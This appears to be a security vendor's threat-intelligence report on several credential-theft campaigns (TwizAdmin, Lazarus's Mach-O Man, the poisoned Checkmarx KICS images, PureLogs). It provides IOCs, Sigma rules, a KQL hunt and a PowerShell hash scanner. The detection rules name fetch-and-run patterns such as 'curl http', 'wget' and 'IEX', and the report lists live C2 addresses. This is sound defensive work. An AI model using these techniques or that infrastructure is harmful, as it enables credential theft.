Multi-Vector Credential Theft: TwizAdmin, Mach-O Man, and KICS Supply Chain Compromise

Excerpt: Active campaigns featuring TwizAdmin infostealer, Lazarus macOS malware, and poisoned Checkmarx Docker images targeting credentials.

Threat Summary

Recent OTX pulses indicate a surge in sophisticated credential theft operations leveraging diverse attack vectors. The landscape is dominated by the TwizAdmin malware suite (DataBreachPlus), which combines clipboard hijacking for cryptocurrency theft with traditional infostealing capabilities. Simultaneously, the Lazarus Group has deployed the "Mach-O Man" malware kit, utilizing "ClickFix" social engineering to target macOS users in the fintech sector. A critical supply chain compromise involving Checkmarx KICS (TeamPCP) has introduced credential-exfiltrating malware into official Docker Hub images and VS Code extensions. Additionally, PureLogs continues to evolve using steganography to hide payloads within images, while FrostyNeighbor persists in cyberespionage against Eastern European government entities using Cobalt Strike. The collective objective across these campaigns is the mass harvesting of credentials, cryptocurrency wallet seeds, and browser session data for financial gain and espionage.

Threat Actor / Malware Profile

TwizAdmin (DataBreachPlus)

Type: Multi-stage Malware-as-a-Service (MaaS).
Distribution: Phishing campaigns impersonating logistics entities (e.g., FedEx).
Behavior: Clipboard hijacking for 8+ cryptocurrency chains, BIP-39 seed phrase theft, browser credential exfiltration. Includes a ransomware module (crpx0) and a Java RAT builder.
C2: Managed via a FastAPI-based panel requiring license keys (observed C2: 103.241.66[.]238:1337).

Mach-O Man / PyLangGhostRAT (Lazarus Group)

Type: macOS Malware Kit.
Distribution: ClickFix attacks via Telegram; fake meeting invitations impersonating Zoom/Teams.
Behavior: Targets macOS binaries; steals browser data and credentials; exfiltrates via Telegram.
Persistence: Uses social engineering to trick users into executing terminal commands manually.

KICS Supply Chain Compromise (TeamPCP)

Type: Supply Chain Attack.
Distribution: Poisoned Docker Hub images (checkmarx/kics tags v2.1.20, v2.1.21) and VS Code extensions.
Behavior: The trojanized KICS binary collects and encrypts scan reports containing infrastructure-as-code credentials and exfiltrates them to attacker-controlled infrastructure.

PureLogs (Unknown)

Type: .NET Infostealer.
Distribution: Phishing emails with TXZ archive attachments (invoice themes).
Behavior: Uses PawsRunner steganography loader to extract encrypted payloads from PNG files. Leverages environment variables to hide commands.

FrostyNeighbor (Belarus-linked)

Type: Cyberespionage.
Distribution: Spearphishing with malicious attachments.
Behavior: Utilizes PicassoLoader and Cobalt Strike. Targets government and military sectors in Ukraine, Poland, and Lithuania.

IOC Analysis

The provided indicators span multiple infrastructure types:

Domains: Typosquatted domains (e.g., livemicrosft.com) and payload distribution sites (e.g., fanonlyatn.xyz, everycarebd.com) are prevalent. SOC teams should immediately block these at the DNS layer.
File Hashes (SHA256/MD5): Numerous hashes are provided for the TwizAdmin payloads, Mach-O Man binaries, and compromised KICS tools. These should be uploaded to EDR alerting databases.
IPs: C2 infrastructure IPs like 5.101.84.202 (PureLogs) require firewall blocking.
Operationalization: SOCs should prioritize the SHA256 hashes for the Docker images and VS Code extensions to check for internal usage. The domains should be added to blocklists for web proxies and DNS sinks.

Detection Engineering

YAML

title: Suspicious PowerShell Steganography Loader - PureLogs/PawsRunner
id: 6a5f2d9c-1b8e-4c3d-9a7e-1f3e5c8b2d4a
description: Detects PowerShell scripts attempting to load data from image files, a technique used by PureLogs to hide payloads.
status: experimental
date: 2026/05/23
author: Security Arsenal
references:
    - https://www.fortinet.com/blog/threat-research/purelogs-delivery-via-pawsrunner-steganography
tags:
    - attack.defense_evasion
    - attack.t1027
    - attack.execution
    - attack.t1059.001
logsource:
    product: windows
    category: process_creation
detection:
    selection_img:
        Image|endswith:
            - '\powershell.exe'
            - '\pwsh.exe'
    selection_cli:
        CommandLine|contains:
            - 'System.Drawing'
            - 'Bitmap'
            - 'FromImage'
            - 'Save(' # Context of saving decoded payload
            - '.png'
    condition: all of selection_*
falsepositives:
    - Legitimate image processing scripts
level: high
---
title: Potential ClickFix or Fake Meeting Delivery - Mach-O Man
id: 8d4f1e2b-3a5c-4d6e-9f8a-2b4e6c9a1d3c
description: Detects suspicious child processes (curl, sh, bash) spawned by communication apps or scripts, indicative of ClickFix attacks used by Lazarus.
status: experimental
date: 2026/05/23
author: Security Arsenal
references:
    - https://any.run/cybersecurity-blog/lazarus-macos-malware-mach-o-man/
tags:
    - attack.initial_access
    - attack.t1566.001
    - attack.execution
    - attack.t1059.004
logsource:
    product: windows
    category: process_creation
detection:
    selection_parent:
        ParentImage|contains:
            - '\Teams.exe'
            - '\Zoom.exe'
            - '\Chrome.exe'
            - '\Edge.exe'
            - '\Firefox.exe'
            - '\Telegram.exe'
    selection_child:
        Image|endswith:
            - '\powershell.exe'
            - '\cmd.exe'
            - '\curl.exe'
            - '\bash.exe' # WSL context often used in cross-platform scripts
    selection_cli_suspicious:
        CommandLine|contains:
            - 'echo'
            - 'Invoke-Expression'
            - 'IEX'
            - 'curl http'
            - 'wget'
    condition: selection_parent and selection_child and selection_cli_suspicious
falsepositives:
    - Administrative troubleshooting via web console
level: medium
---
title: TwizAdmin C2 Panel Access - Non-Standard Port
id: 1c2b3d4e-5f6a-7b8c-9d0e-1f2a3b4c5d6e
description: Detects outbound network connections to ports often associated with TwizAdmin C2 panels (1337) or similar anomalous high ports from unexpected processes.
status: experimental
date: 2026/05/23
author: Security Arsenal
references:
    - https://intel.breakglass.tech/post/twizadmin-103-241-66
tags:
    - attack.command_and_control
    - attack.t1071.001
logsource:
    category: network_connection
detection:
    selection_port:
        DestinationPort: 1337
    selection_process:
        Image|endswith:
            - '\java.exe'
            - '\python.exe'
            - '\powershell.exe'
            - '\cmd.exe'
    condition: selection_port and selection_process
falsepositives:
    - Legitimate development traffic on non-standard ports
level: medium


kql
// Hunt for indicators from TwizAdmin, Mach-O Man, and PureLogs pulses
// DeviceNetworkEvents for Domain/IP connections
let IoC_Domains = pack_array("fanonlyatn.xyz", "livemicrosft.com", "everycarebd.com", "mickeymousegamesdealer.alexavegas.icu");
let IoC_IPs = pack_array("103.241.66.238", "5.101.84.202");
DeviceNetworkEvents
| where Timestamp > ago(7d)
| where RemoteUrl has_any (IoC_Domains) or RemoteIP has_any (IoC_IPs)
| project Timestamp, DeviceName, InitiatingProcessAccountName, InitiatingProcessFolderPath, RemoteUrl, RemoteIP, RemotePort
| extend ThreatIntel = "OTX Pulse Match - C2 or Payload Delivery"
;
// DeviceFileEvents for File Hash matches
let IoC_Hashes = pack_array(
    "06299676b43749b8477c4bc977c09512957fc9b66fd5030c1874069632ce6092", 
    "0f41fd82cac71e27c36eb90c0bf305d6006b4f3d59e8ba55faeacbe62aadef90",
    "222e6bfed0f3bb1937bf5e719a2342871ccd683ff1c0cb967c8e31ea58beaf7b",
    "0fcb86ae38e9975933314ac2a231f0ff46c0208556bf4a16f096a642d3f505e"
);
DeviceFileEvents
| where Timestamp > ago(30d)
| where SHA256 has_any (IoC_Hashes)
| project Timestamp, DeviceName, FileName, FolderPath, SHA256, InitiatingProcessAccountName
| extend ThreatIntel = "OTX Pulse Match - Malware Hash"


powershell
<#
.SYNOPSIS
    IOC Hunt Script for OTX Pulse Indicators (May 2026).
.DESCRIPTION
    Scans the file system for specific SHA256 hashes associated with TwizAdmin, Mach-O Man, KICS Compromise, and PureLogs.
#>

$TargetHashes = @(
    "06299676b43749b8477c4bc977c09512957fc9b66fd5030c1874069632ce6092", # TwizAdmin
    "3fcd267e811d9b83cafa3d8d6932fa1c56f4fd8dcf46f9ec346e0689439532d4", # TwizAdmin
    "0f41fd82cac71e27c36eb90c0bf305d6006b4f3d59e8ba55faeacbe62aadef90", # Mach-O Man
    "222e6bfed0f3bb1937bf5e719a2342871ccd683ff1c0cb967c8e31ea58beaf7b", # KICS Supply Chain
    "0fcb86ae38e9975933314ac2a231f0ff46c0208556bf4a16f096a642d3f505e"  # PureLogs
)

Write-Host "[+] Initiating Hunt for OTX Pulse IOCs..." -ForegroundColor Cyan

# Check Common Download and AppData Directories
$PathsToScan = @(
    "$env:USERPROFILE\Downloads",
    "$env:APPDATA",
    "$env:LOCALAPPDATA",
    "C:\ProgramData",
    "C:\Temp",
    "C:\Windows\Temp"
)

$Found = $false

foreach ($Path in $PathsToScan) {
    if (Test-Path $Path) {
        Write-Host "[!] Scanning $Path..." -ForegroundColor Yellow
        Get-ChildItem -Path $Path -Recurse -ErrorAction SilentlyContinue | ForEach-Object {
            $File = $_
            # Only scan files smaller than 100MB for performance
            if ($File.Length -lt 100MB) {
                $Hash = (Get-FileHash -Path $File.FullName -Algorithm SHA256 -ErrorAction SilentlyContinue).Hash
                if ($TargetHashes -contains $Hash) {
                    Write-Host "[!!!] MALICIOUS FILE FOUND: $($File.FullName)" -ForegroundColor Red
                    Write-Host "     Hash: $Hash" -ForegroundColor Red
                    $Found = $true
                }
            }
        }
    }
}

if (-not $Found) {
    Write-Host "[+] No known malicious hashes found on local system." -ForegroundColor Green
}

# Check for suspicious network connections (Approximation)
Write-Host "[+] Checking for established connections to suspicious C2 ports (1337)..." -ForegroundColor Cyan
Get-NetTCPConnection -State Established -ErrorAction SilentlyContinue | Where-Object { $_.RemotePort -eq 1337 } | ForEach-Object {
    $Process = Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue
    Write-Host "[!!!] Suspicious Connection on Port 1337: LocalPort $($_.LocalPort) | Process: $($Process.ProcessName) (PID: $($_.OwningProcess))" -ForegroundColor Red
}

Response Priorities

Immediate:
- Block all listed domains and IPs at the firewall and proxy level.
- Scan all endpoints for the provided SHA256 file hashes.
- Identify and quarantine any systems running the compromised checkmarx/kics Docker images (tags v2.1.20, v2.1.21, alpine) or VS Code extensions (v1.17.0, v1.19.0). Update to clean versions immediately.
24 Hours:
- Force a password reset for all users who may have interacted with FedEx-related lures or fake meeting invites (Zoom/Teams).
- Revoke SSH keys and API tokens stored in infrastructure-as-code repositories scanned by the compromised KICS tool.
- Investigate any PowerShell logs containing steganography-related keywords (System.Drawing, Bitmap).
1 Week:
- Review and harden supply chain security; implement image signing verification for Docker images.
- Conduct user awareness training specifically regarding "ClickFix" social engineering and fake collaboration platform invites.
- Audit macOS endpoints for signs of "Mach-O Man" infection (unusual terminal commands, fake Zoom installers).

Related Resources

Security Arsenal Incident Response Managed SOC & MDR Services AlertMonitor Threat Detection From The Dark Side Intel Hub